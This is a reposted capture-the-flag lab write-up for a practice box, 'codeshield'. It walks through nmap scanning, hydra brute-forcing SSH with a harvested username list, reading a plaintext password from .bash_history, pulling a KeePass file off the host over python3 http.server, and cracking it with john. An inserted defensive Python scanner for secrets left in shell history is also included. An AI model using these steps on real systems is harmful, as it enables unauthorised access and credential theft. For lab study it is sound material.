【OSCP】codeshield

admin, 2024-10-28 14:07:41, comments 6 views, 2995 characters, reading time 9 min 59 s

OSCP Labs
Box overview

codeshield

easy

Enumeration, wordlist generation, hydra brute forcing, credential harvesting, kdbx file cracking, using KeePassXC

Enumeration

Host discovery

nmap -sn 192.168.1.0/24

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-03 05:15 EST
Nmap scan report for 192.168.1.100
Host is up (0.00082s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
443/tcp open ssl/http nginx
465/tcp open ssl/smtp Postfix smtpd
587/tcp open smtp Postfix smtpd
993/tcp open imaps?
995/tcp open pop3s?
2222/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3389/tcp open ms-wbt-server xrdp
22222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:61:49:1F (Oracle VirtualBox virtual NIC)
Service Info: Hosts: -mail.codeshield.hmv, mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.30 seconds

Directory scan

dirb https://192.168.1.100

Initial access

A PDF is retrieved from the FTP server; it contains a password.

Collect user names from the website to build a wordlist, then brute-force the admin backend and SSH with it.

angelina johnson
john doe
bob watson
jennifer cruise
kevin valdez
jessica carlson
mohammed mansour
xian tan
annabella cocci
thomas mitchell
patrick early

With the names collected, use the following script to generate a username wordlist:

https://github.com/w0Tx/generate-ad-username

hydra -L users.txt -P pass.txt ssh://192.168.1.100 -s 22222

Privilege escalation

A hidden directory in valdezk's home directory contains passwords.

Trying them one by one gives a login as mitchellt and the first flag.

earlyp's password is found in mitchellt's .bash_history; logging in with it succeeds.

mitchellt@codeshield:~$ cat .bash_history 
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"
cp -r /tmp/mining .
ls
cd mining/
ls
exit
mitchellt@codeshield:~$ su earlyp
Password:
earlyp@codeshield:/home/mitchellt$ ls
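The bash_history leak above is worth hunting for on one's own hosts, since a password piped into su (or passed to sshpass or mysql -p) is stored verbatim in the history file; the following Python scanner is an added example, not part of the original write-up, and runs over constructed history lines with invented secrets and user names.

```python
import re

# Constructed sample .bash_history lines (not taken from a real host);
# the secret values and user names are invented placeholders.
SAMPLE_HISTORY = """\
ls -la
echo 'Example-Secr3t!' | su - devuser -c "cp -r /home/devuser/project ."
cd project/
sshpass -p 'AnotherExampl3' ssh devuser@10.0.0.5
mysql -u app -pDbPassExample -e 'select 1'
git status
"""

# Each pattern captures the secret in group 1 so it can be redacted in the report.
PATTERNS = {
    "echo-piped-into-su": re.compile(r"echo\s+['\"]?([^'\"|]+?)['\"]?\s*\|\s*su\b"),
    "sshpass-inline":     re.compile(r"sshpass\s+-p\s*['\"]?([^'\"\s]+)"),
    "mysql-inline":       re.compile(r"\bmysql\b.*?\s-p([^\s'\"]+)"),
}


def redact(secret):
    """Keep the first two characters so an analyst can correlate, hide the rest."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def scan_history(text):
    """Return (line_no, pattern_name, redacted_secret, command) for every hit."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for name, pat in PATTERNS.items():
            m = pat.search(line)
            if m:
                findings.append((no, name, redact(m.group(1)), line.strip()))
    return findings


if __name__ == "__main__":
    for no, name, secret, cmd in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {name} secret={secret}")
```

Run it over /root/.bash_history and every /home/*/.bash_history during an audit; the fix is to stop passing secrets on the command line (let su prompt interactively) rather than to clear the history afterwards.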

An encrypted kdbx file sits in earlyp's Documents directory; download it and crack it.

earlyp@codeshield:~/Documents$ ls -all
total 12
drwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 .
drwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 ..
-rw------- 1 earlyp earlyp 1918 Aug 28 2023 Passwords.kdbx
earlyp@codeshield:~/Documents$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.103 - - [03/Mar/2024 14:58:21] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [03/Mar/2024 14:58:25] "GET /Passwords.kdbx HTTP/1.1" 200 -

This step only succeeds with the wordlist built earlier.

┌──(root㉿kali)-[~/下载]
└─# keepass2john Passwords.kdbx > hash

┌──(root㉿kali)-[~/下载]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt

┌──(root㉿kali)-[~/下载]
└─# john hash --wordlist=users.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 3225806 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mandalorian (Passwords)
1g 0:00:00:24 DONE (2024-03-03 10:09) 0.04110g/s 1.972p/s 1.972c/s 1.972C/s carlson.jessica..moh-man
Use the "--show" option to display all of the cracked passwords reliably

With that password, open the database and read the root login password:

https://app.keeweb.info

KeePassXC can also be used to open the database file.

End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】codeshield

Posted by admin on 2024-10-28 14:07:41. Reposts should keep this article's link (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/3316931.html